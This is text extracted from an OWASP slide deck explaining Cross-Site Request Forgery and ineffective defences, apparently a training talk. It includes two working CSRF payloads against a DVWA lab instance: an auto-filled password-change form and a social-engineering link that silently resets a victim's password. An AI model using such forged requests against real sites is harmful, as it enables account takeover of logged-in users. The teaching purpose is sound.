Upload
globe-telecom
View
107
Download
0
Embed Size (px)
Citation preview
CROSS SITE REQUEST FORGERYUNDERSTANDING
John Patrick Lita - OWASP Manila Chapter PresidentVenue: Philippine Army, Cyber Security Division, Taguig City OWASP Taguig Chapter
DEEP UNDERSTANDING WITH CSRF VULNERABILITY
MEET THE PRESENTER
OWASP Manila Chapter PresidentProject Manager at Enterprise Linux ProfessionalsOwner of Active Security Training and Consultancy
Project leader for OWASP Online Academy
2
DEEP UNDERSTANDING WITH CSRF VULNERABILITY
CROSS SITE REQUEST FORGERY
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.
3
DEEP UNDERSTANDING WITH CSRF VULNERABILITY
CSRF ILLUSTRATION
4
C
Regular Form CSRF Form Template
COMMENT HERE: COMMENT HERE:
POST POST
DEEP UNDERSTANDING WITH CSRF VULNERABILITY
CSRF ILLUSTRATION
5
C
Regular Form CSRF Form Template
COMMENT HERE: COMMENT HERE:
POST POST
I AM AWESOME!
DEEP UNDERSTANDING WITH CSRF VULNERABILITY
CSRF ILLUSTRATION
6
C
Regular Form CSRF Form Template
COMMENT HERE: COMMENT HERE:
POST POST
I AM AWESOME!
Jaypee: I AM AWESOME!
DEEP UNDERSTANDING WITH CSRF VULNERABILITY
CSRF ILLUSTRATION
7
C
Regular Form CSRF Form Template
COMMENT HERE: COMMENT HERE:
POST POST
I AM NOOB!
DEEP UNDERSTANDING WITH CSRF VULNERABILITY
CSRF ILLUSTRATION
8
C
Regular Form CSRF Form Template
COMMENT HERE: COMMENT HERE:
POST POST
I AM NOOB!
DEEP UNDERSTANDING WITH CSRF VULNERABILITY
CSRF ILLUSTRATION
9
C
Regular Form CSRF Form Template
COMMENT HERE: COMMENT HERE:
POST POST
I AM NOOB!
Jaypee: I AM NOOB!
DEEP UNDERSTANDING WITH CSRF VULNERABILITY
CANNOT READ THE ANTI-CSRF
10
DEEP UNDERSTANDING WITH CSRF VULNERABILITY
NO SERVER SIDE VALIDATION
11
DEEP UNDERSTANDING WITH CSRF VULNERABILITY
REVIEWING THE FORM
12
DEEP UNDERSTANDING WITH CSRF VULNERABILITY
THE CHECKING THE SOURCE CODE
13
CSRF DEMODEEP UNDERSTANDING WITH CSRF VULNERABILITY
PREVENTION MEASURES THAT DO NOT WORK
CSRF TEMPLATE WEB INTERFACE
Try to copy the code of the CSRF Template and save it as HTML File. then open the file with any browser you like. then click the submit and analyse the behaviour.After that try yo login. please proceed to next page for source code. Page 16
15
PREVENTION MEASURES THAT DO NOT WORK
CSRF TEMPLATE SOURCE CODE
<!DOCTYPE html>
<html> <head> <title>CSRF Template</title> </head><body><br>
<form action="http://172.16.157.129/dvwa/vulnerabilities/csrf/?" method="GET"> New Password:<br> <input type="password" AUTOCOMPLETE="off" name="password_new" value="12345"><br> Confirm New Password: <br> <input type="password" AUTOCOMPLETE="off" name="password_conf" value="12345"><br> <input type="submit" value="Change" name="Change"> </form></body></html>
16
PREVENTION MEASURES THAT DO NOT WORK
PREVENTION MEASURES THAT DO NOT WORK
▸ Using a secret cookie
▸ Remember that all cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request.
17
PREVENTION MEASURES THAT DO NOT WORK
PREVENTION MEASURES THAT DO NOT WORK
▸ Only Accept POST requests
▸ Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can trick a victim into submitting a forged POST request, such as a simple form hosted in an attacker's Website with hidden values. This form can be triggered automatically by JavaScript or can be triggered by the victim who thinks the form will do something else.
POSTREQUEST
18
PREVENTION MEASURES THAT DO NOT WORK
PREVENTION MEASURES THAT DO NOT WORK
▸ Multi-Step Transaction Multi-Step transactions are not an adequate prevention of CSRF. As long as an attacker can predict or deduce each step of the completed transaction, then CSRF is possible.
▸ URL Rewriting This might be seen as a useful CSRF prevention technique as the attacker cannot guess the victim's session ID. However, the user’s session ID is exposed in the URL. We don't recommend fixing one security flaw by introducing another.
▸ HTTPSHTTPS does nothing to defend against CSRF.
19
CSRF DEMODEEP UNDERSTANDING WITH CSRF VULNERABILITY
PREVENTION MEASURES THAT DO NOT WORK
CSRF ATTACK USING SOCIAL ENGINEERING
One of the technique or attack vector is to perform a click jacking attack, to test this attack please proceed on the next page for the source code, then try to executing it by clicking the “Click Here!”
21
PREVENTION MEASURES THAT DO NOT WORK
CSRF ATTACK USING SOCIAL ENGINEERING
<!DOCTYPE html>
<html><title>Please Check your Account Here!</title> <head>Check your account Here!</head> <body>
<a href="http://172.16.157.129/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#">Click Here!</a></body></html>